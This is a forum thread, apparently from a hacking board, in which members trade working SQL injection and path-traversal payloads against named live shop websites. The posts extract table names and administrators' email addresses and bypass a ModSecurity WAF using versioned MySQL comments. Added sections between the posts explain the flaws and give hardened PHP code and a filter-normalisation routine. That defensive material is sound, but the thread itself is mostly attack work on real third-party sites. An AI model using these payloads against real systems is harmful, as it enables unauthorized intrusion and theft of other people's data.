Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    There's a script
    echo file_get_contents('fike_'.$_GET['file']);
    any ideas how to read index.php or something else??)
     
  2. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    Figured the Drupal one out: through the DB and the admin panel you can iframe it, via blocks in fact
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    .php?file=/../../../../../etc/passwd
    .php?file=/../index.php

    PS. Br@!ns,
    Code:
    https://www.phd-fitness.co.uk/store/user_account.php?lang=1%27+and+substr%28@@version,1,1%29=5--+
    parentheses are filtered there, but URL encoding solves that problem :)
     
    _________________________
    #23663 yarbabin, 4 Dec 2014
    Last edited: 4 Dec 2014
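    The snippet from the first post, with a hardened form beside it. This is an added example, not code posted by anyone in the thread; the `files/` directory and the allowlist entries are assumptions made for the illustration.

```php
<?php
// Added example: the concatenation pattern from the first post next to a hardened version.
// The directory name and the allowlist contents are assumptions, not taken from the thread.

// Vulnerable form (as in the thread): a fixed prefix does nothing against '../' sequences,
// so a value such as '/../index.php' resolves outside the intended file set.
function readFileVulnerable(string $file)
{
    return file_get_contents('file_' . $file);
}

// Hardened form, three independent controls:
//  1. an allowlist of the names the application actually serves;
//  2. basename() so directory separators in the input are discarded before lookup;
//  3. a realpath() check that the resolved file stays inside the intended directory,
//     which also covers cases the allowlist author did not anticipate.
function readFileSafe(string $file, string $baseDir = __DIR__ . '/files'): string
{
    static $allowed = ['price' => 'file_price.txt', 'terms' => 'file_terms.txt'];

    $key = basename($file);
    if (!isset($allowed[$key])) {
        // Generic message: do not echo the submitted value or a filesystem path.
        throw new InvalidArgumentException('Unknown document');
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Document unavailable');
    }

    return file_get_contents($path);
}

// Usage: the request parameter is only ever used as a lookup key, never as a path fragment.
// echo readFileSafe($_GET['file'] ?? '');
```

    With the allowlist in place, both `file=/../index.php` and `file=/../../../../../etc/passwd` fail at the `isset()` check; the `realpath()` comparison is kept as a second, independent boundary.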
  4. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    Is there a vulnerability or not, I can't tell?
    It would be nice to dump the print materials)
     
  5. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Not via that link.

    route is not a dynamic parameter:
    /u/index.php?product_id=36103

    product_id is int-cast:
    /u/index.php?product_id=36103x
    /u/index.php?product_id=x36103
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    What makes you think so? No.
     
    _________________________
  7. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    ppppppppppppp damn ...

    help me out

    POST request

    &more[]=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

    response

    Duplicate entry 'ex_info:1' for key 'group_key'

    well damn, and then it's a dead end, how do I pull out these tables((
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    and iterate over all the fields with LIMIT :)
    and, by the way, a simpler query is possible
    Code:
    and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))
    UPDATE:
    Code:
    1'and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))='1
    this should work
     
    _________________________
    #23668 yarbabin, 7 Dec 2014
    Last edited: 7 Dec 2014
  9. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    thanks, the simpler one doesn't work

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '";}',
     
  10. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    may I ask one more question

    what am I doing wrong again

    (SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

    returns 16

    while

    (SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

    returns

    Subquery returns more than 1 row
    (((
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    try it like this:
    Code:
    (SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    changing it to the id you need.
     
    _________________________
  12. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    ((
    Subquery returns more than 1 row
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT substr(group_concat(email),1,150) FROM administrator),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    If the problem isn't solved, message me on jabber, no point cluttering the thread. It wouldn't hurt you to read the MySQL manuals first.
     
    _________________________
  14. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Thanks, almost solved, I'll figure out the rest
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    (SELECT COUNT(*),CONCAT((SELECT mid(email,1,20) FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
     
    _________________________
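    Posts 7 to 15 above work only because the application concatenates the `more[]` parameter into its SQL and returns the raw MySQL error text ("Duplicate entry ...", "Subquery returns more than 1 row") to the client; madhatter's int-casting note in post 5 is the third piece. As an added example that is not code from the thread, here is the same `administrators` lookup written so that none of those conditions holds. The DSN, credentials and request shape are assumptions.

```php
<?php
// Added example (not from the thread). Table and column names follow the thread
// (administrators, id, email); the DSN, credentials and request handling are assumptions.

function connect(): PDO
{
    return new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'app', 'secret', [
        // Raise exceptions on SQL errors instead of continuing with a failed statement...
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // ...and use server-side prepared statements rather than client-side interpolation.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Condition 1: the input is spliced into the SQL text, so a quote in the parameter
// closes the string literal. Fix: bind the value; it travels separately from the query.
function adminEmail(PDO $pdo, string $idParam): ?string
{
    // Condition 2 (the int-casting check from post 5): validate numeric ids before the
    // database ever sees them. '36103x' and 'x36103' are rejected here instead of being
    // left to MySQL's string-to-number coercion.
    if (!ctype_digit($idParam)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT email FROM administrators WHERE id = :id');
    $stmt->bindValue(':id', (int) $idParam, PDO::PARAM_INT);
    $stmt->execute();
    $email = $stmt->fetchColumn();
    return $email === false ? null : $email;
}

// Condition 3: the MySQL error message reaches the HTTP response. That message is the
// oracle the duplicate-key and extractvalue payloads read from. Fix: log the detail
// server-side and return a generic message.
function handleRequest(array $query): string
{
    try {
        $email = adminEmail(connect(), $query['id'] ?? '');
        return $email === null ? 'Not found' : $email;
    } catch (PDOException $e) {
        error_log('DB error: ' . $e->getMessage()); // server log only
        return 'Temporary error';                    // nothing about the SQL state leaks
    }
}

// ini_set('display_errors', '0'); // belt and braces: PHP itself must not print exceptions
// echo handleRequest($_GET);
```

    With `display_errors` off and the generic catch block, a payload like the one in post 7 produces the same "Temporary error" response as any other failed request, so there is no per-row difference left to extract data through.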
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    there is

    it filters user(), and as far as I can tell it filters "table_name", maybe someone can suggest something? :)

    PS don't send many requests too often, you'll get banned
     
  17. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Code:
    http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1
    
    http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1
    
     
    3 people like this.
  18. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    how to get past a WAF like this?

    HTML:
    https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
    HTML:
    https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
    it filters the union+select combination and concat
     
  19. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Old version of ModSecurity. The script runs two queries in a row with different numbers of columns, 4 and 7.

    Code:
    /store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
     
    2 people like this.
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25

    and how can this be bypassed next? :)

    HTML:
    https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20
    
     
    #23680 Br@!ns, 9 Dec 2014
    Last edited: 9 Dec 2014
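    Posts 18 to 20 show a keyword filter that matches "union select" in the raw parameter and therefore misses the same keywords wrapped in MySQL versioned comments (`/*!50000...*/`), whose body the server executes when its version is at least 5.0.0. As an added example that is not code from the thread or from ModSecurity, this is the normalisation step a filter needs before keyword matching, run over constructed samples modelled on the posts above.

```php
<?php
// Added example (not from the thread, not ModSecurity code). Sample inputs are constructed.
// A filter that inspects the raw string sees two comments; MySQL sees "union select".
// Normalising first makes the filter and the database parser agree.

function normaliseSql(string $s): string
{
    $s = rawurldecode($s);
    // Versioned comments: MySQL executes the body, so keep the body and drop the wrapper.
    $s = preg_replace('~/\*!\d*(.*?)\*/~s', ' $1 ', $s);
    // Ordinary comments are whitespace to MySQL; treat them the same way.
    $s = preg_replace('~/\*.*?\*/~s', ' ', $s);
    // Collapse whitespace (and '+' from form encoding) so keyword adjacency is visible.
    $s = preg_replace('~[\s+]+~', ' ', $s);
    return strtolower(trim($s));
}

// Match on the normalised form: a quote breakout followed by union ... select.
function looksLikeSqlInjection(string $param): bool
{
    $n = normaliseSql($param);
    return (bool) preg_match('~\'.*\bunion\W*(all\W+)?select\b~', $n);
}

// Constructed samples modelled on the thread, not captured traffic.
$samples = [
    "43'+union(select(1,2,3,4))+--+",                        // caught by a naive filter too
    "43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x", // slips past the naive filter
    "43",                                                     // ordinary value
];
foreach ($samples as $s) {
    printf("%-60s %s\n", $s, looksLikeSqlInjection($s) ? 'flag' : 'ok');
}
```

    The second sample normalises to `43' union select 1,2,3,4,5,6,7-- x`, which the single pattern then flags, while the plain `43` passes. The same normalisation should also be applied to the keyword list from post 18 (`concat`, `user()`, `table_name`) rather than maintaining a separate rule for every comment variant.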